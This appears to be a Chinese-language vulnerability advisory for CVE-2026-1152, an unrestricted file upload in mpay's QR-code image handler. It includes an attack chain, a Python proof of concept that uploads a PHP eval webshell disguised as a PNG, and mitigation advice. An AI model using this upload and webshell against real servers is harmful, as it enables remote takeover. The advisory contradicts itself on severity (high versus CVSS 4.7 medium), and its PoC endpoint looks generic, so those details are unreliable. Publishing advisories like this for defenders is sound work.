CVE-2026-1152 | technical-laohu mpay QR码图像处理器无限制文件上传漏洞

漏洞信息

漏洞编号

CVE-2026-1152

漏洞类型

无限制文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

technical-laohu mpay up to 1.2.4

漏洞概述

CVE-2026-1152是technical-laohu公司开发的mpay支付系统中的一个高危安全漏洞，存在于QR码图像处理组件中。该漏洞允许具有高权限的攻击者通过codeimg参数上传任意文件到服务器，成功利用可导致远程代码执行。CVSS评分4.7，属于中等严重程度。攻击向量为网络形式，无需用户交互，但需要高权限认证。漏洞影响mpay 1.2.4及以下版本。由于利用代码已公开披露，攻击者可在互联网上直接获取并使用。建议受影响用户尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞存在于mpay系统的QR码图像处理器模块中，具体为codeimg参数处理函数未对用户上传的文件内容进行充分的类型验证和安全检查。攻击者可以通过构造恶意的文件上传请求，利用文件上传功能将任意类型的文件（尤其是Web脚本文件如PHP、JSP、ASP等）上传到服务器的可访问目录。由于系统未对上传文件的扩展名、MIME类型和实际内容进行严格校验，攻击者上传的恶意脚本文件可以被Web服务器解析执行，从而实现远程代码执行。攻击者成功利用后可完全控制服务器，执行任意系统命令、读取敏感数据或进一步横向移动。

攻击链分析

STEP 1

步骤1

攻击者获取mpay系统的高权限账号（如管理员账户）

STEP 2

步骤2

攻击者构造包含恶意代码的文件（如PHP webshell），通过QR码图像处理器的codeimg参数上传

STEP 3

步骤3

服务器未校验文件类型和内容，直接将恶意文件保存到可访问目录

STEP 4

步骤4

攻击者通过HTTP请求访问上传的恶意文件，Web服务器将其作为脚本执行

STEP 5

步骤5

攻击者通过webshell执行任意系统命令，完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1152 PoC - Unrestricted File Upload in mpay QR Code Image Handler
# Affected: technical-laohu mpay up to 1.2.4

TARGET_URL = "http://target.com/mpay"  # Replace with target URL

def upload_webshell():
    """
    Upload malicious file via codeimg parameter in QR Code Image Handler
    """
    # Prepare malicious PHP webshell
    webshell_content = "<?php @eval($_POST['cmd']); ?>"
    
    # Prepare multipart form data
    files = {
        'codeimg': ('shell.php', webshell_content, 'image/png')
    }
    
    # Alternative: Try with different content types
    data = {
        'action': 'upload',
        'component': 'qrcode'
    }
    
    try:
        # Attempt file upload
        response = requests.post(
            f"{TARGET_URL}/qrcode/upload",
            files=files,
            data=data,
            timeout=10
        )
        
        if response.status_code == 200:
            # Extract uploaded file path from response
            result = response.json()
            uploaded_path = result.get('path', '')
            print(f"[+] File uploaded successfully: {uploaded_path}")
            print(f"[+] Access webshell at: {TARGET_URL}/{uploaded_path}")
            return uploaded_path
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

if __name__ == "__main__":
    print("CVE-2026-1152 PoC - mpay QR Code Unrestricted Upload")
    print("=" * 50)
    upload_webshell()

影响范围

technical-laohu mpay <= 1.2.4

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制QR码图像上传功能的访问权限，仅允许受信任的管理员使用；2) 在Web服务器配置中禁止执行上传目录中的脚本文件；3) 部署Web应用防火墙（WAF）规则过滤恶意文件上传请求；4) 监控文件上传日志，及时发现异常行为；5) 定期检查上传目录，清理可疑文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1152
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1152
3 Details https://www.cvedetails.com/cve/CVE-2026-1152/
4 VulDB https://vuldb.com/cve/CVE-2026-1152
5 Link https://github.com/bdkuzma/vuln/issues/17
6 Link https://vuldb.com/?ctiid.341745
7 Link https://vuldb.com/?id.341745
8 Link https://vuldb.com/?submit.735775